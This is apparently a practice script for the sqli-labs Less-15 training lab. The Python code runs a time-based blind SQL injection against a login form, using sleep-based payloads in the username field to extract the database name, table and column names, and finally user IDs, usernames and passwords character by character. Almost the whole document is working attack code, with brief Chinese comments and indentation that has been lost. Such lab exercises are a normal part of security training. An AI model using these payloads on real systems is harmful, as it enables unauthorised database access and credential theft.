Less15import requests
from datetime import datetime
url = "http://192.168.232.132/sqli-labs/Less-15/"
def database():
j = 1
s = ''
for _ in range(10):
for i in range(65, 123):
payload = {
# 用and前提是前面也都得是数据库有的
"uname":f"Dumb' and if(ascii(substring(database(),{j},1))={i},sleep(2),1)#",
"passwd":"1"}
start_time = datetime.now()
res = requests.post(url=url,data=payload)
used_time = datetime.now() - start_time
if(used_time.seconds > 1):
s = s + chr(i)
print(s)
j += 1
print(s)
def table():
j = 1
s = ''
for _ in range(20):
for i in range(23, 123):
payload = {
# 用and前提是前面也都得是数据库有的
"uname":f"Dumb' and if(ascii(substring((select group_concat(table_name) from information_schema.tables where table_schema=database() ),{j},1))={i},sleep(2),1)#",
"passwd":"1"}
start_time = datetime.now()
res = requests.post(url=url,data=payload)
used_time = datetime.now() - start_time
if(used_time.seconds > 1):
s = s + chr(i)
print(s)
j += 1
print(s)
def column():
j = 1
s = ''
for _ in range(10):
for i in range(23, 123):
payload = {
# 用and前提是前面也都得是数据库有的
"uname":f"Dumb' and if(ascii(substring((select group_concat(column_name,0x2d) from information_schema.columns where table_schema=database() and table_name='users' limit 0,1),{j},1))={i},sleep(2),1)#",
"passwd":"1"}
start_time = datetime.now()
res = requests.post(url=url,data=payload)
used_time = datetime.now() - start_time
if(used_time.seconds > 1):
s = s + chr(i)
print(s)
j += 1
def data():
j = 1
s = ''
for _ in range(100):
for i in range(23, 123):
payload = {
# 用and前提是前面也都得是数据库有的
"uname":f"Dumb' and if(ascii(substring((select group_concat(id,0x2d,username,0x2d,password) from users limit 0,1),{j},1))={i},sleep(2),1)#",
"passwd":"1"}
start_time = datetime.now()
res = requests.post(url=url,data=payload)
used_time = datetime.now() - start_time
if(used_time.seconds > 1):
s = s + chr(i)
print(s)
j += 1
# 当使用了group_concat聚合结果后不用limit一个一个出结果可以一起出结果
table()